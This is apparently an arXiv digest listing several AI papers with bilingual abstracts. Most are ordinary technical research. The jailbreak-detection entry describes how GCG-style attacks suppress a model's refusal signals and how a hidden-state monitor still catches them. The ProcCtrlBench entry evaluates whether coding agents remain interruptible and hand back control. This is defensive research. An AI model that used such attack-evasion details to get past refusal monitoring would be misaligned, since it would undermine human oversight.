Neural operators serve as fast, data-driven surrogates for scientific modeling but typically rely on a monolithic, single-pass inference procedure that struggles to resolve high-frequency details, a limitation known as spectral bias. We introduce the Iterative Refinement Neural Operator (IRNO), which augments pre-trained operators with a learned refinement module applied iteratively via fixed-point iteration. IRNO decomposes the prediction into a coarse initialization followed by successive residual corrections, paralleling classical numerical solvers. Under local assumptions, we establish contraction of the induced operator, ensuring convergence to a unique fixed point. To explicitly target high-frequency errors, we propose a progressive spectral loss that adaptively increases the penalty on high-frequency components over refinement steps during training. Across physical systems, IRNO consistently lowers error, with up to 56.05% improvement on turbulent flow. On Active Matter, spectral analysis reveals that, relative to the base operator, the normalized error ratios decrease to 27.72-36.10% at low, 5.07-6.68% at mid, and 1.48-2.04% at high frequencies, remaining stable beyond the trained iteration count. Code is available at https://github.com/xiaotianliu-dartmouth/Iterative_Refinement_Neural_Operator
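
The fixed-point view in this abstract can be illustrated with a classical analogue. The sketch below is a toy under stated assumptions, not the IRNO architecture: the 3x3 system `A`, `b`, the Jacobi-style `refine` step, and the zero vector standing in for a coarse first-pass prediction are all hypothetical choices made for illustration. It shows a coarse initialization followed by repeated residual corrections, where the update map is a contraction and the iterates therefore approach a unique fixed point.

```python
# Toy analogue of "coarse initialization + residual corrections" (not the IRNO model).
# Goal: solve A u = b for a small, strictly diagonally dominant system.

def matvec(A, u):
    """Dense matrix-vector product on plain Python lists."""
    return [sum(a * x for a, x in zip(row, u)) for row in A]

def residual(A, b, u):
    """Residual b - A u of the current estimate."""
    return [bi - ri for bi, ri in zip(b, matvec(A, u))]

def refine(A, b, u):
    """One Jacobi-style correction: u + D^{-1} (b - A u), with D the diagonal of A."""
    r = residual(A, b, u)
    return [ui + ri / A[i][i] for i, (ui, ri) in enumerate(zip(u, r))]

def iterate(A, b, u0, steps):
    """Apply the same refinement map repeatedly and record the max residual per step."""
    u = list(u0)
    history = []
    for _ in range(steps):
        u = refine(A, b, u)
        history.append(max(abs(r) for r in residual(A, b, u)))
    return u, history

A = [[4.0, 1.0, 0.0],
     [1.0, 4.0, 1.0],
     [0.0, 1.0, 4.0]]
b = [5.0, 6.0, 5.0]    # chosen so that the exact solution is [1, 1, 1]
u0 = [0.0, 0.0, 0.0]   # hypothetical stand-in for a coarse single-pass prediction

u, history = iterate(A, b, u0, steps=25)
print(u)
print(history[0], history[-1])
```

Because `A` is strictly diagonally dominant, each refinement step shrinks the error, which mirrors, in a much simpler linear setting, the contraction argument the abstract refers to.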

2605.23910 2026-05-27 cs.CL cs.AI Updated version

Document Classification Pattern Recognition via Information Fusion: A Systematic Review of Multimodal and Multiview Representation Approaches

基于信息融合的文档分类模式识别:多模态与多视角表示方法的系统综述

Marcin Michał Mirończuk

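Affiliations: National Information Processing Institute

AI summary: Through a systematic review and meta-analysis, this paper proposes a unified framework, quantifies the performance gains of multimodal and multiview fusion in document classification, and exposes a lack of methodological rigour in the field.

Details
Journal ref
Information Fusion, 132, 2026, 104247
AI Chinese abstract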

信息融合被广泛用于通过整合多数据源(多模态)或多表示(多视角)来改进文档分类。然而,该领域缺乏统一框架、对其有效性的定量综合以及给实践者的明确指导。本系统综述通过分析139项主要研究来填补这些空白。它引入了一个正式框架来结构化该领域,呈现了定性分析结果以识别关键趋势,并进行了随机效应元分析(据我们所知,这是首次专注于文档分类的元分析)以量化性能提升。我们的元分析显示,多模态融合显著提高了准确率(平均提升+5.28个百分点,$p=0.0016$)——F1分数效应方向为正,但在我们的主要模型中统计上不显著。多视角融合在准确率(+4.67%)、F1分数(+3.08%)和召回率(均$p<0.05$)上提供了一致但适度的提升。关键的是,我们的定性综合揭示了方法学严谨性方面的可重复性挑战:只有11.8%(多模态)和23.3%(多视角)的研究使用统计检验来验证其发现,这削弱了许多结果的可靠性。本综述的主要贡献是一个统一框架、首个定量证据基础以及数据驱动的指南。本综述得出结论,成功的信息融合不依赖于算法复杂性,而在于融合方法与任务上下文的战略对齐以及对更严格验证的承诺。

English abstract

Information fusion is widely used to improve document classification by integrating multiple data sources (multimodal) or multiple representations (multiview). However, the field lacks a unified framework, a quantitative synthesis of its effectiveness, and clear guidance for practitioners. This systematic review addresses these gaps by analysing 139 primary studies. It introduces a formal framework to structure the field, presents a qualitative analysis that identifies key trends, and performs a random-effects meta-analysis (to our knowledge, the first focused on document classification) to quantify performance gains. Our meta-analysis reveals that multimodal fusion significantly improves accuracy (mean gain of +5.28 percentage points, $p=0.0016$); the F1-score effect is directionally positive but statistically non-significant in our primary model. Multiview fusion provides consistent but modest gains in accuracy (+4.67%), F1-score (+3.08%), and recall (all $p<0.05$). Critically, our qualitative synthesis uncovers reproducibility challenges stemming from limited methodological rigour: only 11.8% (multimodal) and 23.3% (multiview) of the studies use statistical tests to validate their findings, which undermines the reliability of many of their results. This review's primary contributions are a unifying framework, the first quantitative evidence base, and data-driven guidelines. It concludes that successful information fusion depends not on algorithmic complexity, but on the strategic alignment of the fusion method with the task context and a commitment to more rigorous validation.
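
For readers unfamiliar with how a random-effects meta-analysis pools per-study gains, the sketch below may help. It is a minimal illustration under stated assumptions: the abstract does not say which estimator the review uses, so the DerSimonian-Laird estimator here is an assumed, common choice, and the `gains` and `variances` values are made-up toy inputs, not data from the review.

```python
import math

def random_effects(effects, variances):
    """Pool per-study effects y_i (with variances v_i) using DerSimonian-Laird.

    Returns (pooled effect, standard error, between-study variance tau^2,
    two-sided normal p-value).
    """
    k = len(effects)
    w = [1.0 / v for v in variances]                      # fixed-effect weights
    fixed = sum(wi * yi for wi, yi in zip(w, effects)) / sum(w)
    q = sum(wi * (yi - fixed) ** 2 for wi, yi in zip(w, effects))  # Cochran's Q
    c = sum(w) - sum(wi ** 2 for wi in w) / sum(w)
    tau2 = max(0.0, (q - (k - 1)) / c)                    # truncated at zero
    w_star = [1.0 / (v + tau2) for v in variances]        # random-effects weights
    pooled = sum(wi * yi for wi, yi in zip(w_star, effects)) / sum(w_star)
    se = math.sqrt(1.0 / sum(w_star))
    z = pooled / se
    p = math.erfc(abs(z) / math.sqrt(2.0))                # equals 2 * (1 - Phi(|z|))
    return pooled, se, tau2, p

# Hypothetical accuracy gains (percentage points) and their sampling variances.
gains = [3.0, 6.5, 4.2, 8.1, 5.0]
variances = [1.0, 2.0, 1.5, 2.5, 1.2]

pooled, se, tau2, p = random_effects(gains, variances)
print(f"pooled gain = {pooled:.2f} pp, SE = {se:.2f}, tau^2 = {tau2:.2f}, p = {p:.4g}")
```

The between-study variance `tau2` widens the weights when studies disagree more than their sampling error explains, which is what distinguishes this pooling from a fixed-effect average.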

2605.22511 2026-05-27 cs.AI cs.CL cs.IR Updated version

Search-E1: Self-Distillation Drives Self-Evolution in Search-Augmented Reasoning

Search-E1: 自蒸馏驱动搜索增强推理中的自我进化

Zihan Liang, Yufei Ma, Ben Chen, Zhipeng Qian, Xuxin Zhang, Huangyu Dai, Lingtao Mao

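AI summary: Proposes Search-E1, which alternates vanilla GRPO with on-policy self-distillation (OPSD) so that a search-augmented agent can self-evolve without external supervision or complex auxiliary modules. With a 3B model it surpasses all open-source baselines on seven QA benchmarks.

Details
AI Chinese abstract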

后训练已成为将语言模型转变为胜任的搜索增强推理智能体的主要方法。近期一系列工作通过在此标准流程之上添加复杂机制来进一步提升性能。这些增强引入了来自更强外部系统的外部监督,附加了诸如过程奖励模型或回顾性评论者等辅助模块,通过树搜索或多阶段课程重构了轨迹生成本身,并利用手工设计的奖励和惩罚来塑造奖励。每项增加都带来了可衡量的提升,但同时也使训练流程更加复杂,并将方法绑定到可能并非总是可用的资源或设计上。我们退一步思考这些机制是否真的必要,并提出了Search-E1,一种自我进化方法,让搜索增强智能体仅通过普通的GRPO与在线策略自蒸馏(OPSD)交替进行来改进。在每轮GRPO之后,策略在其自身的训练问题上进行轨迹生成。然后,一个token级的前向KL目标将策略的推理时分布与其在特权上下文下的自身分布对齐,该特权上下文暴露了更高效的兄弟轨迹。尽管简单,该过程自然地提供了密集的每步监督。在七个QA基准上,Search-E1使用Qwen2.5-3B达到了0.440的平均EM,在两个规模上均超越了所有开源基线。代码和完整版本将很快公开。

English abstract

Post-training has become the dominant recipe for turning a language model into a competent search-augmented reasoning agent. A line of recent work pushes its performance further by adding elaborate machinery on top of this standard pipeline. These augmentations import external supervision from stronger external systems, attach auxiliary modules such as process reward models or retrospective critics, restructure the rollout itself with tree search or multi-stage curricula, or shape the reward with hand-crafted bonuses and penalties. Each addition delivers a measurable gain, but each also inflates the training pipeline and ties the recipe to resources or designs that may not always be available. We take a step back and ask whether any of this machinery is actually necessary, and propose Search-E1, a self-evolution method that lets a search-augmented agent improve through only vanilla GRPO interleaved with on-policy self-distillation (OPSD). After each GRPO round, the policy rolls out on its own training questions. A token-level forward KL objective then aligns the policy's inference-time distribution to its own distribution under a privileged context that exposes a more efficient sibling trajectory. Despite this simplicity, the procedure naturally provides dense per-step supervision. On seven QA benchmarks, Search-E1 reaches 0.440 average EM with Qwen2.5-3B, surpassing all open-source baselines at both scales. Code and complete version will be made public soon.
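
The token-level forward KL objective mentioned above can be sketched as follows. This is an illustration under stated assumptions, not the authors' implementation: the direction KL(teacher || student), with the privileged-context distribution treated as the teacher, is an assumed reading of "forward KL", and the logits in `teacher_seq` and `student_seq` are hypothetical toy values over a three-token vocabulary.

```python
import math

def softmax(logits):
    """Numerically stable softmax over one token position."""
    m = max(logits)
    exps = [math.exp(x - m) for x in logits]
    z = sum(exps)
    return [e / z for e in exps]

def forward_kl(teacher_logits, student_logits):
    """KL(teacher || student) at a single token position."""
    p = softmax(teacher_logits)
    q = softmax(student_logits)
    return sum(pi * (math.log(pi) - math.log(qi))
               for pi, qi in zip(p, q) if pi > 0.0)

def sequence_loss(teacher_seq, student_seq):
    """Mean per-token forward KL, plus the per-token values (dense supervision)."""
    per_token = [forward_kl(t, s) for t, s in zip(teacher_seq, student_seq)]
    return sum(per_token) / len(per_token), per_token

# Hypothetical logits: same policy, scored with and without the privileged context.
teacher_seq = [[2.0, 0.5, -1.0], [0.1, 0.2, 3.0]]   # with privileged context
student_seq = [[1.0, 1.0, 0.0], [0.0, 0.0, 1.0]]    # plain inference-time context

loss, per_token = sequence_loss(teacher_seq, student_seq)
print(loss, per_token)
```

Every token position contributes its own term to the loss, which is one way to read the abstract's remark that the procedure provides dense per-step supervision.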

2605.22468 2026-05-27 cs.LG cs.AI Updated version

BioFormer: Rethinking Cross-Subject Generalization via Spectral Structural Alignment in Biomedical Time-Series

BioFormer: 通过频谱结构对齐重新思考生物医学时间序列中的跨主体泛化

Guikang Du, Haoran Li, Xinyu Liu, Zhibo Zhang, Xiaoli Gong, Jin Zhang

Affiliations: College of Computer Science, Nankai University, Tianjin, China; College of Cyber Science, Tianjin Key Laboratory of Interventional Brain-Computer Interface and Intelligent Rehabilitation, Key Lab of Data and Intelligent System Security, Frontiers Science Center for New Organic Matter, Nankai University, Tianjin, China

AI summary: Proposes BioFormer, which explicitly models subject-specific variability through the lens of spectral drift and aligns spectral structure with a frequency-band alignment module and sample-conditional layer normalization, improving F1-score by 6% on six datasets.

Details
AI Chinese abstract

生物医学时间序列中的跨主体泛化指在一些主体数据上训练并在未见主体上测试。关键挑战是抑制BTS表示中的主体特异性变异。大多数现有方法通过模型构建或主体对抗学习隐式抑制变异,但很少显式建模。我们引入频谱漂移作为表征主体特异性变异的新视角。具体来说,相同标签下的BTS信号通常共享一致的振荡结构,但在特定频率分量上表现出依赖于主体的幅度或相位偏移,我们将其解释为主体特异性变异。基于这一见解,我们提出BioFormer。其核心是频带对齐模块(FBAM),该模块从频谱分布生成带级调制因子,并自适应调整幅度和相位以对齐频谱结构,从而减轻变异。我们进一步将FBAM与样本条件层归一化配对,该归一化从内在信号统计量而非主体身份推断归一化参数,稳定跨主体表示。在六个数据集上的大量实验表明,BioFormer优于12个基线,绝对F1分数提升6%。

English abstract

Cross-subject generalization in biomedical time-series (BTS) refers to training on data from some subjects and testing on unseen subjects. The key challenge is to suppress subject-specific variability in BTS representations. Most existing methods implicitly suppress the variability through model building or subject adversarial learning, but rarely model it explicitly. We introduce spectral drift as a new perspective to characterize subject-specific variability. Specifically, BTS signals under the same label often share consistent oscillatory structure, yet exhibit subject-dependent magnitude or phase shifts in specific frequency components, which we interpret as subject-specific variability. Building on this insight, we propose BioFormer. At its core is a Frequency-Band Alignment Module (FBAM) that generates band-wise modulation factors from the spectral distribution and adaptively adjusts amplitude and phase to align spectral structure, thereby mitigating variability. We further pair FBAM with Sample Conditional Layer Normalization, which infers normalization parameters from intrinsic signal statistics rather than subject identity, stabilizing cross-subject representations. Extensive experiments on six datasets demonstrate that BioFormer outperforms 12 baselines, yielding absolute F1-score improvements of 6%.

2605.20530 2026-05-27 cs.AI cs.CL cs.LG cs.SE Updated version

AgentAtlas: Beyond Outcome Leaderboards for LLM Agents

AgentAtlas:超越LLM智能体的结果排行榜

Parsa Mazaheri, Kasra Mazaheri

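Affiliations: University of California, Santa Cruz; Massachusetts Institute of Technology

AI summary: Proposes the AgentAtlas framework, which uses a control-decision taxonomy and a trajectory-failure vocabulary to separate agent evaluation into outcome success, control-decision quality, and trajectory quality, and highlights the measurement risks of relying on outcome-only leaderboards.

Details
AI Chinese abstract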

大型语言模型智能体现在可以操作代码库、浏览器、操作系统、日历、文件和工具生态系统,但它们的评估通常将行为简化为最终任务成功。AgentAtlas将智能体评估重新定义为一种诊断词汇和审计协议,用于将结果成功与控制决策质量和轨迹质量分离。本文贡献了:(i) 一个六状态控制决策分类法(行动/询问/拒绝/停止/确认/恢复);(ii) 一个包含主要错误源和下游影响的轨迹失败词汇表;(iii) 对十五个智能体基准的0/1/2基准覆盖审计;(iv) 一个在合成1,342项数据集上进行的说明性协议研究,使用八种模型在分类法感知和分类法盲提示格式下进行评估。该合成演示不是公开基准发布,不应被视为确定的模型比较。相反,它说明了两个测量风险:当显式标签菜单被移除时,映射标签一致性可能发生显著变化,并且轴选择可能改变表观排名。AgentAtlas旨在帮助基准设计者说明他们覆盖的行为,并帮助评估者诊断仅结果排行榜隐藏的失败。

English abstract

Large language model agents now act on codebases, browsers, operating systems, calendars, files, and tool ecosystems, but their evaluations often collapse behavior into final task success. AgentAtlas reframes agent evaluation as a diagnostic vocabulary and audit protocol for separating outcome success from control-decision quality and trajectory quality. The paper contributes: (i) a six-state control-decision taxonomy (Act / Ask / Refuse / Stop / Confirm / Recover); (ii) a trajectory-failure vocabulary with primary error source and downstream impact; (iii) a 0/1/2 benchmark-coverage audit over fifteen agent benchmarks; and (iv) an illustrative protocol study on a synthetic 1,342-item set evaluated with eight models under taxonomy-aware and taxonomy-blind prompt formats. The synthetic demonstration is not a public benchmark release and should not be read as a definitive model comparison. Instead, it illustrates two measurement risks: mapped label agreement can change substantially when the explicit label menu is removed, and axis choice can change apparent rankings. AgentAtlas is intended to help benchmark designers state what behavior they cover, and to help evaluators diagnose failures that outcome-only leaderboards hide.

2605.20251 2026-05-27 cs.SE cs.AI Updated version

ProcCtrlBench: Evaluating Process-Level Defects and Control Preservation in LLM Coding Agents

ProcCtrlBench: 评估LLM编码智能体中的过程级缺陷与控制保持

Jiawei He, Jie Jia, Chenbo Liu, Chaoyi Xue, Yapeng Song, Xikai Yang, Dong Sun

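Affiliations: Amap, Alibaba Group

AI summary: Proposes the ProcCtrlBench benchmark, which uses a reusable defect ontology and a standardized trajectory representation to evaluate the execution quality of LLM coding agents from process evidence rather than final outcomes alone, and introduces control preservation to quantify properties of the execution process such as interpretability and interruptibility.

Comments 22 pages, 8 figures

Details
AI Chinese abstract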

现有的LLM编码智能体基准主要评估最终结果。虽然有助于衡量整体能力,但这些指标提供的可见性有限,常常遗漏执行过程中出现的缺陷。我们提出了ProcCtrlBench,一个用于LLM编码智能体执行过程评估的基准。ProcCtrlBench将重复出现的执行缺陷组织成一个可复用的本体,涵盖4类11种缺陷类型,并通过标准化的过程证据而非仅最终结果来评估智能体轨迹。为了支持异构智能体之间的比较,ProcCtrlBench将原始日志标准化为统一的轨迹表示,并报告基于过程发现的校准评分卡。此外,ProcCtrlBench使用控制保持作为量化执行过程质量的方式,捕获执行是否保持可解释、可中断、可纠正、可逆,并在需要时能够交还控制权。我们在从三个基准(AndroidBench、TerminalBench和SWE-bench-Verified)中采样的200个案例上评估了ProcCtrlBench。结果表明,ProcCtrlBench可以以有用的可靠性实例化,提供比直接阈值化更稳定的语义,并揭示了传统基于结果的评估常常忽略的执行质量的有意义差异。

English abstract

Existing benchmarks for LLM coding agents primarily evaluate final outcomes. While useful for measuring overall capability, these metrics provide limited visibility and often miss defects that arise during execution. We present ProcCtrlBench, a benchmark for execution-process evaluation in LLM coding agents. ProcCtrlBench organizes recurrent execution defects into a reusable ontology covering 11 defect types in 4 categories, and evaluates agent trajectories through standardized process evidence rather than final outcomes alone. To support comparison across heterogeneous agents, ProcCtrlBench standardizes raw logs into a unified trajectory representation and reports calibrated scorecards over process-level findings. In addition, ProcCtrlBench uses control preservation as a way to quantify execution-process quality, capturing whether execution remains interpretable, interruptible, correctable, reversible, and able to hand back authority when needed. We evaluate ProcCtrlBench on 200 cases sampled from three benchmarks: AndroidBench, TerminalBench, and SWE-bench-Verified. Results show that ProcCtrlBench can be instantiated with useful reliability, provides more stable semantics than direct thresholding, and reveals meaningful differences in execution quality that are often overlooked by conventional outcome-based evaluation.

2605.03309 2026-05-27 cs.CR cs.AI cs.SE Updated version

Cryptographic Registry Provenance: Structural Defense Against Dependency Confusion in AI Package Ecosystems

加密注册表溯源:针对AI包生态系统中依赖混淆的结构性防御

Alan L. McCann

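Affiliations: Mashin, Inc.

AI summary: Proposes a cryptographic registry provenance system that defends against dependency confusion attacks through three layers: registry identity signing, a dual-signature model, and authoritative namespace binding.

Comments 15 pages, 1 figure, 4 tables. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

Details
AI Chinese abstract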

依赖混淆攻击利用了软件分发中的结构性缺陷:一旦包被安装,就没有加密证据证明是哪个注册表分发的。所有现有防御都是基于配置的,并且在配置错误时会静默失败。我们提出一个加密分发溯源系统,包含三个组件:(1) 加密注册表身份,每个注册表持有一个Ed25519密钥对,并对其分发的每个工件进行签名;(2) 双重签名模型,发布者在打包时签名,注册表在发布时副署;(3) 权威命名空间绑定,消费者固定注册表指纹,解析器从加密上拒绝来自未授权注册表的工件。这些创建了三层防御,需要同时攻破才能成功攻击。对八个生态系统(npm、Cargo、Hex.pm、PyPI、Go模块、Docker/OCI、NuGet、Maven)的比较显示,没有现有生态系统结合了强制发布者签名、加密注册表身份、强制注册表副署和消费者端加密执行。该系统扩展到AI生成溯源作为签名属性,以及治理强制依赖解析。一个案例研究将分发溯源与三层运行时治理架构集成,创建了一个无加密间隙的四阶段生命周期链。

English abstract

Dependency confusion attacks exploit a structural gap in software distribution: once a package is installed, there is no cryptographic proof of which registry distributed it. Every existing defense is configuration-based and fails silently when misconfigured. We present a cryptographic distribution provenance system comprising three components: (1) cryptographic registry identity, where every registry holds an Ed25519 keypair and signs every artifact it distributes; (2) a dual-signature model, where the publisher signs at packaging time and the registry countersigns at publication time; and (3) authoritative namespace binding, where consumers pin registry fingerprints and the resolver cryptographically rejects artifacts from unauthorized registries. These create three defense layers requiring simultaneous compromise for a successful attack. A comparison across eight ecosystems (npm, Cargo, Hex.pm, PyPI, Go modules, Docker/OCI, NuGet, Maven) shows no existing ecosystem combines mandatory publisher signing, cryptographic registry identity, mandatory registry countersigning, and consumer-side cryptographic enforcement. The system extends to AI-generation provenance as a signed attribute and governance-enforced dependency resolution. A case study integrates distribution provenance with a three-layer runtime governance architecture, creating a four-phase lifecycle chain with no cryptographic gaps.
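
The consumer-side check described in component (3), combined with the dual signatures from component (2), can be sketched roughly as below. This is a hypothetical illustration, not the paper's implementation: the artifact fields, the SHA-256 fingerprint format, the `namespace/package` naming, and the choice to have the registry countersign the payload together with the publisher signature are all assumptions. Signature verification is passed in as a callable; `toy_sign` and `toy_verify` are insecure placeholders used only to make the demo run, and a real deployment would plug in an Ed25519 verifier instead.

```python
import hashlib

def fingerprint(public_key: bytes) -> str:
    """Hex SHA-256 digest used here as the pinned registry fingerprint (assumed format)."""
    return hashlib.sha256(public_key).hexdigest()

def resolve(artifact: dict, pins: dict, verify) -> tuple:
    """Return (accepted, reason) for one artifact.

    verify(public_key, message, signature) -> bool is supplied by the caller.
    """
    namespace = artifact["name"].split("/", 1)[0]
    pinned = pins.get(namespace)
    if pinned is None:
        return False, "no pinned registry for namespace"
    if fingerprint(artifact["registry_key"]) != pinned:
        return False, "registry key does not match pin"
    if not verify(artifact["publisher_key"], artifact["payload"], artifact["publisher_sig"]):
        return False, "publisher signature invalid"
    # Assumption: the registry countersigns payload + publisher signature.
    countersigned = artifact["payload"] + artifact["publisher_sig"]
    if not verify(artifact["registry_key"], countersigned, artifact["registry_sig"]):
        return False, "registry countersignature invalid"
    return True, "ok"

# Demo helpers: a keyed hash standing in for a signature (NOT secure, illustration only).
def toy_sign(key: bytes, message: bytes) -> bytes:
    return hashlib.sha256(key + message).digest()

def toy_verify(key: bytes, message: bytes, signature: bytes) -> bool:
    return toy_sign(key, message) == signature

def make_artifact(name, payload, publisher_key, registry_key):
    """Build an artifact signed by the publisher and countersigned by the registry."""
    publisher_sig = toy_sign(publisher_key, payload)
    return {
        "name": name, "payload": payload,
        "publisher_key": publisher_key, "publisher_sig": publisher_sig,
        "registry_key": registry_key,
        "registry_sig": toy_sign(registry_key, payload + publisher_sig),
    }

pins = {"acme": fingerprint(b"internal-registry-key")}
good = make_artifact("acme/utils", b"pkg-bytes", b"publisher-key", b"internal-registry-key")
evil = make_artifact("acme/utils", b"malware", b"attacker-key", b"public-registry-key")

print(resolve(good, pins, toy_verify))
print(resolve(evil, pins, toy_verify))
```

In this sketch the same-named package served by an unpinned registry is rejected before any signature is even checked, which is the structural property that distinguishes pinning from a configuration-only defense.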

2605.02958 2026-05-27 cs.CR cs.AI cs.CL cs.LG Updated version

Tracing the Dynamics of Refusal: Exploiting Latent Refusal Trajectories for Robust Jailbreak Detection

追踪拒绝的动态:利用潜在拒绝轨迹进行鲁棒越狱检测

Xulin Hu, Che Wang, Wei Yang Bryan Lim, Jianbo Gao, Zhong Chen

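Affiliations: Peking University; Nanyang Technological University; Beijing Jiaotong University

AI summary: Uses causal tracing to identify a sparse "refusal trajectory" activation pattern and proposes SALO, a lightweight white-box detector that operates on hidden-state windows for robust jailbreak detection.

Comments Accepted to the 43rd International Conference on Machine Learning (ICML 2026). Camera-ready version

Details
AI Chinese abstract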

表征工程分析通常使用从终端或池化表示中提取的静态方向来描述拒绝。我们质疑这种观点是否忽略了拒绝是如何在层-标记位置上构建的。通过因果追踪,我们识别出一个“拒绝轨迹”:一种稀疏的上游激活模式,即使当诸如GCG的攻击抑制终端拒绝信号时,该模式也常常持续存在。基于这一观察,我们提出了SALO(稀疏激活定位算子),一种轻量级白盒检测器,它在选定层窗口的原始隐藏状态体积上操作。在Qwen、Llama和Mistral模型上,SALO在固定的XSTest校准工作点下,改进了多个攻击家族的越狱检测。我们进一步分析了静态RepE风格基线、ROI敏感性、自适应GCG攻击和编码输入边界情况,阐明了拒绝轨迹监测的前景和局限性。

English abstract

Representation Engineering analyses often characterize refusal using static directions extracted from terminal or pooled representations. We ask whether this view misses how refusal is constructed across layer-token positions. Using causal tracing, we identify a Refusal Trajectory: a sparse upstream activation pattern that often persists even when attacks such as GCG suppress terminal refusal signals. Based on this observation, we propose SALO (Sparse Activation Localization Operator), a lightweight white-box detector that operates on raw hidden-state volumes from a selected layer window. Across Qwen, Llama, and Mistral models, SALO improves jailbreak detection on several attack families under a fixed XSTest-calibrated operating point. We further analyze static RepE-style baselines, ROI sensitivity, adaptive GCG attacks, and encoded-input boundary cases, clarifying both the promise and limitations of refusal-trajectory monitoring.

2605.02035 2026-05-27 cs.CL cs.AI Updated version

VIDA: A dataset for Visually Dependent Ambiguity in Multimodal Machine Translation

VIDA: 多模态机器翻译中视觉依赖歧义的数据集

Jingheng Pan, Xintong Wang, Longyue Wang, Liang Ding, Weihua Luo, Chris Biemann

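Affiliations: Department of Informatics, Universität Hamburg; Alibaba Group; Alibaba Cloud

AI summary: Presents VIDA, a dataset of 2,500 carefully curated instances for evaluating ambiguities in multimodal machine translation that can only be resolved with visual evidence, and introduces disambiguation-centric metrics. Experiments show that chain-of-thought fine-tuning improves out-of-distribution disambiguation.

Details
AI Chinese abstract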

歧义消解是多模态机器翻译(MMT)中的一个关键挑战,模型必须真正利用视觉输入将歧义表达映射到其预期含义。尽管先前的工作提出了面向消歧的基准来评估视觉的作用,但我们观察到现有基准仍受限于任务格式不匹配、歧义覆盖范围狭窄或视觉依赖性验证不足。此外,现有的歧义评估并不适用于开放式翻译中的多种歧义类型。为解决这些局限性,我们提出了VIDA(视觉依赖歧义),一个包含2500个精心策划实例的数据集,其中解析带注释的源语言片段需要视觉证据。我们进一步提出了以消歧为中心的指标,使用LLM作为评判分类器来验证带注释的歧义表达是否在片段级别被正确消解。使用两个最先进的LVLM进行的实验表明,监督微调(SFT)提高了整体翻译质量,而链式思维SFT(CoT-SFT)产生了更强的跨分布歧义消解能力,这表明显式的消歧指导提高了对多种歧义类型的泛化能力。

English abstract

Ambiguity resolution is a key challenge in multimodal machine translation (MMT), where models must genuinely leverage visual input to map an ambiguous expression to its intended meaning. Although prior work has proposed disambiguation-oriented benchmarks probing the role of vision, we observe that existing benchmarks remain limited by task-format mismatch, narrow ambiguity coverage, or insufficient visual-dependency validation. Moreover, existing ambiguity evaluations are not well suited to diverse ambiguity types in open-ended translation. To address these limitations, we present VIDA (Visually-Dependent Ambiguity), a dataset of 2,500 carefully curated instances in which resolving an annotated source span requires visual evidence. We further propose Disambiguation-Centric Metrics that use an LLM-as-a-judge classifier to verify whether annotated ambiguous expressions are resolved correctly at the span level. Experiments with two state-of-the-art LVLMs show that supervised fine-tuning (SFT) improves overall translation quality, while chain-of-thought SFT (CoT-SFT) yields stronger out-of-distribution disambiguation, suggesting that explicit disambiguation guidance improves generalization to diverse ambiguity types.

2605.01037 2026-05-27 cs.CR cs.AI cs.PL Updated version

Certified Purity for Cognitive Workflow Executors: From Static Analysis to Cryptographic Attestation

认知工作流执行器的认证纯度:从静态分析到密码学证明

Alan L. McCann

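Affiliations: Mashin, Inc.

AI summary: Proposes a certified purity architecture that uses WebAssembly compilation, cryptographically signed certificates, and a runtime verification gate to turn governance enforcement in cognitive workflow systems from a runtime convention into a structural capability boundary, eliminating adversarial bypass on the BEAM virtual machine.

Comments 23 pages, 4 figures, 8 tables. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

Details
AI Chinese abstract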

我们提出了一种认证纯度架构,将认知工作流系统中的治理执行从运行时约定转变为结构性能力边界。先前的三层治理架构证明了治理完备性、来源完备性以及不可治理效应的不可能性,这依赖于纯模块约束:即步骤执行器不能执行效应。该约束通过模块导入图分析来执行,但不足以对抗BEAM虚拟机上的对抗性绕过。本文通过四种机制弥补了这一差距:(1)受限的WebAssembly编译目标,其中产生效应的指令在结构上缺失;(2)纯度证书,即密码学签名的证明,将执行器二进制文件与其导入分类绑定;(3)运行时验证门,在未认证执行器进入治理管道之前拒绝它们;以及(4)通过远程证明实现跨组织验证的可移植治理凭证。我们证明了四个定理:结构性纯度由构造保证,所有五种BEAM绕过类别的绕过消除,证书完整性,以及门完备性。该保证相对于显式的可信计算基成立。在四个已实现执行器上的评估显示,验证延迟为39-42微秒,完整计划周期低于400微秒,运行时开销低于100毫秒HTTP请求的0.4%,并且重复调用之间零确定性分歧。

English abstract

We present a certified purity architecture that converts governance enforcement in cognitive workflow systems from a runtime convention into a structural capability boundary. A prior three-layer governance architecture proves governance completeness, provenance completeness, and the impossibility of ungoverned effects, conditional on the pure module constraint: that step executors cannot perform effects. That constraint was enforced by module import graph analysis, which is insufficient against adversarial bypass on the BEAM virtual machine. This paper closes the gap through four mechanisms: (1) a restricted WebAssembly compilation target where effect-producing instructions are structurally absent; (2) purity certificates, cryptographically signed proofs binding executor binaries to their import classifications; (3) a runtime verification gate that rejects uncertified executors before they enter the governance pipeline; and (4) portable governance credentials via remote attestation for cross-organizational verification. We prove four theorems: structural purity by construction, bypass elimination for all five BEAM bypass classes, certificate integrity, and gate completeness. The guarantee holds relative to an explicit Trusted Computing Base. Evaluation on four implemented executors shows verification latency of 39-42 µs, a full plan cycle under 400 µs, runtime overhead under 0.4% of a 100 ms HTTP request, and zero determinism divergences across repeated invocations.

2605.01032 2026-05-27 cs.AI cs.LO cs.PL Updated version

Algebraic Semantics of Governed Execution: Monoidal Categories, Effect Algebras, and Coterminous Boundaries

受控执行的代数语义:幺半范畴、效应代数与共同边界

Alan L. McCann

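Affiliations: Mashin, Inc.

AI summary: Proposes an algebraic semantics for governed execution built on interaction trees and parameterized coinduction. A three-axiom governance algebra record induces a symmetric monoidal category, giving compositional governance that is coterminous with expressibility.

Comments 26 pages, 1 figure, 1 table. Companion proofs: https://github.com/mashin-live/governance-proofs. Project: https://mashin.live. Updated license

Details
AI Chinese abstract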

